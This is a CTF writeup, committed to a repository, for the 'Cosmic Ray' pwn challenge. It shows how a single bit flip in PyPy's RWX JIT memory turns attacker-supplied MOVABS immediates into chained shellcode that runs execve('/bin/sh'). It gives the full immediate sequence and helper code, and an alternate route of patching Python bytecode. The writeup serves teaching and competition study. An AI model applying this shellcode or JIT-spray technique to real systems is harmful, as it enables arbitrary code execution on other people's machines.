Commit 7318c06

feat: Writeup for Cosmic Ray quals challenge
1 parent 9fec17c commit 7318c06

2 files changed: +350 -0 lines changed

---
title: "Cosmic Ray - Ctrl+Space Quals 2025"
date: "2025-10-02"
description: "The official writeup for the challenge Cosmic Ray from the Ctrl+Space Quals 2025 CTF"
tags: ["pwn", "ctf", "ctrl", "space", "mhackeroni"]
showAuthor: false
---

Author: [mebeim](https://github.com/mebeim) (Marco Bonelli)

Full source code of the challenge is available [here](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/).

> I had written a perfect program, when all of a sudden... a cosmic ray was
> enough to pwn my entire system :(


## Description

*For a TL;DR of the solution, just check the comments in [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py).*

The challenge consists of a simple Python 3 program ([`app.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/src/app.py)) run
by the [PyPy][pypy] interpreter that implements a CLI to create and invoke
custom Python `lambda` functions. These functions are built from a limited set
of whitelisted operations, take a single argument and return a single value.

```none
Available commands:
[B]uild a function
[C]all a function
[L]ist functions
[T]rigger a cosmic ray

> B
Name: foo
Input one operation per line, end with "END":
> ADD 10
> MUL 2
> REPEAT 5
> LIST
> END
Function created!

> L
Currently defined functions:
foo = lambda x: list(((((x) + 10) * 2) for _ in range(5)))

> C
Name: foo
Argument: 1
Result: [22, 22, 22, 22, 22]
```

Besides that, the script offers one more interesting command, the cosmic ray,
which lets the user flip a single bit in certain memory areas:

```py
try:
    # Base 0 accepts decimal, hex (0x...), octal (0o...) and binary (0b...)
    where = int(input('Where? '), 0)
except ValueError:
    raise ValueError('Invalid input') from None

# `where` is a bit index: byte offset plus bit position within that byte
offset = where // 8
bit = where % 8

# ... scan /proc/self/maps and calculate vaddr

from cffi import FFI
# Flip the chosen bit of the byte at vaddr
FFI().cast("unsigned char *", vaddr)[0] ^= (1 << bit)
```

This bit flip is only allowed in writable anonymous memory areas, excluding the
process stack, and only once: a global variable is set after the first use and
checked on every later call.


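The elided step in the snippet above has to turn `offset` into a virtual address. The following is only a sketch of how that could work, not the code from `app.py`: it assumes the byte offset indexes into the concatenation of all eligible mappings, and the names `eligible_regions`, `resolve` and `SAMPLE_MAPS` are hypothetical. The `[stack]` line in the sample is made up for illustration.

```python
from typing import List, Optional, Tuple

# Excerpt in /proc/<pid>/maps format, used instead of the live file.
# The last line is an invented stack mapping, added to show the exclusion.
SAMPLE_MAPS = """\
5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c
5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap]
5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap]
7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0
7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0
7ffd5a1e0000-7ffd5a201000 rw-p 00000000 00:00 0 [stack]
"""


def eligible_regions(maps_text: str) -> List[Tuple[int, int]]:
    """Return (start, end) for writable anonymous mappings, stack excluded."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        addr_range, perms, inode = fields[0], fields[1], fields[4]
        name = fields[5] if len(fields) > 5 else ''
        if 'w' not in perms:
            continue  # not writable
        if inode != '0' or name not in ('', '[heap]'):
            continue  # file-backed, or a special mapping such as [stack]
        start, end = (int(x, 16) for x in addr_range.split('-'))
        regions.append((start, end))
    return regions


def resolve(where: int, regions: List[Tuple[int, int]]) -> Optional[Tuple[int, int]]:
    """Map a flat bit index to (vaddr, bit), or None if it is out of range."""
    offset, bit = divmod(where, 8)
    for start, end in regions:
        size = end - start
        if offset < size:
            return start + offset, bit
        offset -= size  # skip this region and keep walking
    return None


if __name__ == '__main__':
    regions = eligible_regions(SAMPLE_MAPS)
    vaddr, bit = resolve(0x3000 * 8 + 3, regions)
    print(hex(vaddr), bit)
```

Whatever the real mapping from `where` to an address is, the useful property for an exploit is the same: a fixed `where` keeps pointing at the same relative spot as long as the layout of the eligible mappings does not change.
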
## Goal

The goal is clear: achieve arbitrary code execution to read the contents of the
`/flag` file. The memory areas where the bit flip is allowed are pretty much
limited to a handful of anonymous mappings: the interpreter heap (brk), the
Python heap (where most Python objects live) and a RWX mapping used by PyPy to
JIT compile Python code whenever it deems it necessary. Anything else is
seemingly untouchable (bad permissions and/or non-anonymous).

```none
$ sudo cat /proc/$(pidof pypy3)/maps
5e177bf9f000-5e177bfa0000 r--p 00000000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa0000-5e177bfa1000 r-xp 00001000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa1000-5e177bfa2000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa2000-5e177bfa3000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c
5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap]
5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap]
7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0
7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0
7a2d7d1f1000-7a2d7e9c3000 rw-p 00000000 00:00 0
...
```

Since the script only allows for one bit flip to happen, a viable solution must
either achieve arbitrary code execution via a single bit flip or use the initial
bit flip to disable the global variable check and allow for more (preferably
unlimited) bit flips.


## Solution

There are two main solution paths, although one of them remains theoretical and
I have not spent too much time investigating its feasibility. It is however
worth mentioning (find it below).

### Altering JITed Code

As you might already know, PyPy is known for its ability to Just-In-Time
compile Python code into machine code (in this case, x86-64). This is done only
if deemed necessary by the interpreter, which means only for "hot" loops. For
example, a long enough loop doing calculations or an infinite `while True` loop
is highly likely to be JITed. The JITed code is written to and executed
directly from a RWX memory region. This is a prime target for a "cosmic ray".

We can create a "hot" loop within a `lambda` function with the `REPEAT`
operation, which translates to `((EXPR) for _ in range(N))` where `N` is
controlled and `EXPR` comes from previous operations (also controlled).

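To make the translation concrete, here is a small sketch that rebuilds the lambda source from a list of operations. It is reconstructed only from the session output shown in the description, so the function name `build_source` and the exact templates for `ADD`, `MUL` and `LIST` are assumptions rather than the real `app.py` logic; other whitelisted operations are not covered.

```python
def build_source(ops):
    """Turn operations like 'ADD 10' into the source of a one-argument lambda."""
    expr = 'x'
    for op in ops:
        name, _, arg = op.partition(' ')
        if name == 'ADD':
            expr = f'({expr}) + {int(arg, 0)}'
        elif name == 'MUL':
            expr = f'({expr}) * {int(arg, 0)}'
        elif name == 'REPEAT':
            # Generator expression: this is the loop that can become "hot"
            expr = f'(({expr}) for _ in range({int(arg, 0)}))'
        elif name == 'LIST':
            # Consuming the generator is what actually runs the loop
            expr = f'list({expr})'
        else:
            raise ValueError(f'unsupported operation: {name}')
    return f'lambda x: {expr}'


if __name__ == '__main__':
    src = build_source(['ADD 10', 'MUL 2', 'REPEAT 5', 'LIST'])
    print(src)
    print(eval(src)(1))
```

Note that `REPEAT` alone only creates a generator; it is the final `LIST` that iterates it, which is why the examples in this writeup always end with `REPEAT N` followed by `LIST`.
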
A very simple lambda built with `ADD 0x1122334455` + `REPEAT 9999` + `LIST` will
be JITed by PyPy at a deterministic offset into the RWX JIT memory area. What's
more interesting is that a large enough constant (between 5 and 8 bytes) will
most likely get embedded *as is* into JITed code as an immediate for the x86
MOVABS instruction (a.k.a. MOV r64, imm64). This is also visible
[in the PyPy codebase][pypy-jit-movabs]. The constant is also handy for finding
the address/offset of a specific piece of JITed code from GDB:

```none
$ sudo pwndbg --pid $(pidof pypy3)
pwndbg> search -t qword --trunc-out 73588229205
Searching for an 8-byte integer: b'UD3"\x11\x00\x00\x00'
[anon_7081faf76] 0x7081faf78679 push rbp /* 0x1122334455 */
[anon_7081faf76] 0x7081faf78945 push rbp /* 0x1122334455 */
...
pwndbg> x/10i 0x7081faf78679 - 2
0x7081faf78677: movabs r11,0x1122334455
0x7081faf78681: add rdi,r11
0x7081faf78684: jo 0x7081faf78c17
```

Doing simple mathematical operations with large values gives us a very good
primitive to inject arbitrary bytes into JITed code via MOVABS. Other ways are
definitely possible, but MOVABS gives us a lot of space. In particular, we have
8 controlled immediate bytes ending up in a RWX region. If we can somehow flip
some bit around the JITed code to jump into the immediate, we can use the first
six bytes to run some arbitrary code, and the last two to perform a short jump
into the immediate of a subsequent MOVABS instruction to continue.

A `lambda` built with a sequence of arithmetic operations with large
immediates can easily turn into a sequence of MOVABS instructions. For example:

```none
ADD 0x1122334455
ADD 0x2233445566
ADD 0x3344556677
REPEAT 10000
LIST
END
```

This will become something like:

```none
...
movabs r11,0x1122334455
add    rdi,r11
jo     0x7bcffd7a0c87
mov    QWORD PTR [rbx+0x28],0xe
mov    QWORD PTR [rbp+0x158],rdi
movabs r11,0x2233445566
add    rdi,r11
jo     0x7bcffd7a0ca3
mov    QWORD PTR [rbx+0x28],0x12
mov    QWORD PTR [rbp+0x158],rdi
movabs r11,0x3344556677
add    rdi,r11
jo     0x7bcffd7a0cbf
...
```

Taking a look at how MOVABS is encoded, we have:

```none
49 bb 55 44 33 22 11 00 00 00    movabs r11, 0x1122334455
```

Flipping bit 3 of the second byte (0xbb becomes 0xb3) turns the instruction
into:

```none
49 b3 55    rex.WB mov r11b, 0x55
44 33 22    xor r12d, DWORD PTR [rdx]
11 00       adc DWORD PTR [rax], eax
...
```

Other variations are also possible, like flipping bit 5 instead (0xbb becomes
0x9b):

```none
49 9b       rex.WB fwait
55          push rbp
44 33 22    xor r12d, DWORD PTR [rdx]
11 00       adc DWORD PTR [rax], eax
...
```

*`fwait`... you really never stop learning new x86 instructions, huh?*

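The byte-level effect of the flip can be checked without a debugger. This is a minimal sketch: `movabs_r11` and `flip_bit` are hypothetical helper names, and `where` here is counted from the start of the instruction, whereas in the challenge it is relative to whatever base the script uses.

```python
import struct


def movabs_r11(imm: int) -> bytes:
    """Encode `movabs r11, imm`: REX.WB (0x49), opcode 0xB8+3, imm64 little-endian."""
    return bytes([0x49, 0xBB]) + struct.pack('<Q', imm)


def flip_bit(code: bytes, where: int) -> bytes:
    """Flip one bit, using the same offset/bit split as the cosmic ray."""
    offset, bit = divmod(where, 8)
    out = bytearray(code)
    out[offset] ^= 1 << bit
    return bytes(out)


if __name__ == '__main__':
    code = movabs_r11(0x1122334455)
    print(code.hex(' '))                       # original encoding
    print(flip_bit(code, 1 * 8 + 3).hex(' '))  # second byte, bit 3: 0xbb -> 0xb3
    print(flip_bit(code, 1 * 8 + 5).hex(' '))  # second byte, bit 5: 0xbb -> 0x9b
```

In both cases the opcode byte stops consuming the full 8-byte immediate, so the CPU decodes the bytes we supplied as instructions.
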
One single bit flip is therefore enough to start executing part of the original
MOVABS immediate we provide as code. We can encode an initial JMP ahead into the
next immediate, perform some instructions, JMP imm8 to the next, and repeat.
This is more than enough to pop a shell.

The only thing we must pay attention to is a small optimization performed by the
PyPy JIT compiler when dealing with consecutive integer values that are "close
enough" to each other (within 32-bit distance). Doing the same as above with
`ADD 0x1122334455` followed by `ADD 0x1122334466` will JIT compile into:

```none
movabs r11,0x1122334455
add    rdi,r11
jo     0x7a721ea94c47
mov    QWORD PTR [rbx+0x28],0xe
mov    QWORD PTR [rbp+0x158],rdi
lea    r11,[r11+0x11]              <<<<<<
add    rdi,r11
jo     0x7a721ea94c63
```

Not a problem if our immediates are "far enough" from each other in value, but
even then, all is fine with a bit of juggling around.

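A quick sanity check on a list of immediates can catch this before sending the payload. The sketch below assumes that "close enough" means the difference between two consecutive constants fits a signed 32-bit displacement, which matches the `lea r11,[r11+0x11]` seen above but is not taken from the PyPy sources; `fits_lea` and `first_close_pair` are hypothetical names.

```python
def fits_lea(prev_imm: int, next_imm: int) -> bool:
    """True if next_imm could be derived from prev_imm with a signed disp32."""
    delta = next_imm - prev_imm
    return -2**31 <= delta < 2**31


def first_close_pair(imms):
    """Index of the first constant that is too close to its predecessor, or None."""
    for i in range(1, len(imms)):
        if fits_lea(imms[i - 1], imms[i]):
            return i
    return None


if __name__ == '__main__':
    print(first_close_pair([0x1122334455, 0x1122334466]))                # 1
    print(first_close_pair([0x1122334455, 0x2233445566, 0x3344556677]))  # None
```

If a pair is flagged, reordering the instructions inside the chunk or changing the padding bytes is usually enough to push the two values apart.
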
Now it's GG. We can read in more shellcode, run existing code (we can definitely
break ASLR now), or even just directly pop a shell via `execve`. The final
sequence of instructions I used to call
`execve("/bin/sh", {"/bin/sh", NULL}, NULL)` looks like this:

```none
ADD 0x01010101011ceb90  ->  jmp short $+0x1e
ADD 0x17eb900068732f68  ->  push 0x68732f                 '/sh\x00'
                            jmp short $+0x19
ADD 0x17eb90102424c148  ->  shl qword ptr [rsp], 16
                            jmp short $+0x19
ADD 0x17eb6e6924048166  ->  add word ptr [rsp], 0x6e69    'in'
                            jmp short $+0x19
ADD 0x17eb90102424c148  ->  shl qword ptr [rsp], 16
                            jmp short $+0x19
ADD 0x616161000000ede9  ->  jmp $+0xf2
ADD 0x61eb622f24048166  ->  add word ptr [rsp], 0x622f    '/b'
                            jmp short $+0x63
ADD 0x61eb90006ae78948  ->  mov rdi, rsp                  rdi = "/bin/sh"
                            push 0
                            jmp short $+0x63
ADD 0x61eb9090e6894857  ->  push rdi
                            mov rsi, rsp                  rsi = {"/bin/sh", NULL}
                            jmp short $+0x63
ADD 0x61eb3bb0c031d231  ->  xor edx, edx                  rdx = NULL
                            xor eax, eax
                            mov al, 0x3b                  rax = __NR_execve
                            jmp short $+0x63
ADD 0x61eb90909090050f  ->  syscall
REPEAT 10000
LIST
```

The first instruction is changed from `movabs r11, 0x01010101011ceb90` to
`rex.WB mov r11b, 0x90; jmp short $+0x1e`, which starts the whole thing. The
only quirk about this solution is that after a few MOVABS instructions PyPy
inserts additional checks in the JITed code, causing the offset between
subsequent MOVABS to change. There is also a big gap in the middle where I have
to waste an entire immediate to fit a JMP rel32 (5 bytes). In any case, no big
deal.

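Most immediates in the listing above share one layout: up to six bytes of code, NOP padding, then a two-byte short jump to the next immediate. A small helper can build them from raw instruction bytes. This is a sketch with a hypothetical name (`pack_chunk`), not code from `expl.py`; it does not cover the first immediate or the one carrying the 5-byte JMP, which are laid out differently.

```python
def pack_chunk(code: bytes, jmp_rel8: int) -> int:
    """Pack <=6 bytes of code plus `jmp short` (EB rel8) into a 64-bit immediate."""
    if len(code) > 6:
        raise ValueError('at most 6 bytes of code fit before the short jump')
    if not 0 <= jmp_rel8 < 0x80:
        raise ValueError('only forward rel8 jumps are handled here')
    body = code.ljust(6, b'\x90') + bytes([0xEB, jmp_rel8])
    # The immediate is stored little-endian, so the first code byte is the LSB
    return int.from_bytes(body, 'little')


if __name__ == '__main__':
    # push 0x68732f ; nop ; jmp short $+0x19
    print(hex(pack_chunk(bytes.fromhex('682f736800'), 0x17)))
    # xor edx, edx ; xor eax, eax ; mov al, 0x3b ; jmp short $+0x63
    print(hex(pack_chunk(bytes.fromhex('31d231c0b03b'), 0x61)))
```

The `rel8` operand is relative to the end of the two-byte jump, which is why `jmp short $+0x19` is encoded as `eb 17`.
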
### Alternate Solution: Altering Python Bytecode

As we all know, Python is an interpreted language with an intermediate bytecode
representation that is executed by the interpreter virtual machine. Instead of
focusing on what happens after the PyPy JIT kicks in, we could also alter the
Python bytecode itself. Assuming that the bytecode for script functions is
stored in one of the memory areas we can modify, and assuming that its offset is
fixed (or at least stable enough), flipping a bit to modify the bytecode can
drastically modify the script's behavior.

There is no obvious way to use a single bit flip to obtain arbitrary [byte]code
execution, let alone re-use some part of existing bytecode to open, read and
print the contents of an arbitrary file. If we want to modify bytecode we will
have to do so to bypass the single cosmic ray limit, and then use more cosmic
rays to edit existing bytecode at will.

If we take a look at the bytecode for the `cosmic_ray()` function using
[`dis.dis()`][py-dis-dis] we can see a few interesting spots where flipping a
bit would result in bypassing the global variable check, allowing infinite
"cosmic rays" to hit. We can also access the raw bytecode as a `bytes` object
via `cosmic_ray.__code__.co_code` to check actual opcodes and arguments.

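The same inspection can be tried on a stand-in function. The sketch below is not the challenge's `cosmic_ray()`: `cosmic_ray_stub` and `global_accesses` are hypothetical names, and opcode numbers and offsets depend on the Python version and implementation, so the values printed locally will not necessarily match PyPy 3.10.

```python
import dis

COSMIC_RAY_HIT = False


def cosmic_ray_stub():
    """Stand-in with the same guard pattern: check a global, then set it."""
    global COSMIC_RAY_HIT
    if COSMIC_RAY_HIT:
        raise RuntimeError('Only one cosmic ray allowed')
    COSMIC_RAY_HIT = True


def global_accesses(func):
    """List (offset, opname, name, raw opcode byte) for global loads and stores."""
    raw = func.__code__.co_code
    found = []
    for ins in dis.get_instructions(func):
        if ins.opname in ('LOAD_GLOBAL', 'STORE_GLOBAL'):
            found.append((ins.offset, ins.opname, ins.argval, raw[ins.offset]))
    return found


if __name__ == '__main__':
    for offset, opname, name, opcode in global_accesses(cosmic_ray_stub):
        print(f'{offset:4d} {opname:<14} {name:<16} opcode=0x{opcode:02x}')
```

Each reported offset is a position inside `co_code`; turning it into a cosmic ray target would still require knowing where that `bytes` object lives in memory.
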
Some interesting opcodes to consider for the bit flip are right at the start and
towards the end of the function:

```none
  0 LOAD_GLOBAL              0 (COSMIC_RAY_HIT)
  2 POP_JUMP_IF_FALSE        8 (to 16)
...
324 LOAD_CONST              22 (True)
326 STORE_GLOBAL             0 (COSMIC_RAY_HIT)
...
```

The opcode for `POP_JUMP_IF_FALSE` is 0x72: flipping its LSB turns it into 0x73,
which is `POP_JUMP_IF_TRUE`. This would simply negate the `if` condition and
allow for unlimited cosmic rays after the first call to the function (which sets
`COSMIC_RAY_HIT = True` before returning).

Similarly, changing the argument for `STORE_GLOBAL` to something other than 0
would cause the script to create a new global variable instead of modifying
`COSMIC_RAY_HIT`. Modifying one of the above opcodes into something else may
also work, depending on the specific case.

There are however a couple of problems with this approach:

1. We are working with offsets into memory, and not absolute addresses. While
   the memory layout seems pretty stable at first, the `cosmic_ray()` function
   imports the `cffi` module, causing a bunch of mappings to be created and also
   moving existing Python objects around. This results in a not-so-predictable
   layout after the first invocation. Subsequent invocations to perform more
   bit flips would need to take this into account.
2. Depending on which opcode we choose to modify and how, we might end up
   crashing the interpreter either via internal check failures or plain and
   simple segmentation faults. For example, I have noticed that changing
   `STORE_GLOBAL 0` to `STORE_GLOBAL 8` (thus creating `FFI = True` globally)
   works on Ubuntu 24 `pypy3`, but crashes with a HLT on Alpine `pypy3` (used
   in the challenge container). YMMV.

These problems are the main reason I did not explore this solution path any
further. It does however still seem within the realm of possibility.


### Complete Exploit

See [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py) for the complete exploit. A simplified version is
available at [`checker/__main__.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/checker/__main__.py) and is intended to be
used as an automated status check.


[pypy]: https://www.pypy.org
[pypy-jit-movabs]: https://github.com/pypy/pypy/blob/76657ba47f6d48c7db77615d3a26bd5029f8b05a/rpython/jit/backend/x86/rx86.py#L886
[py-dis-dis]: https://docs.python.org/3/library/dis.html#dis.dis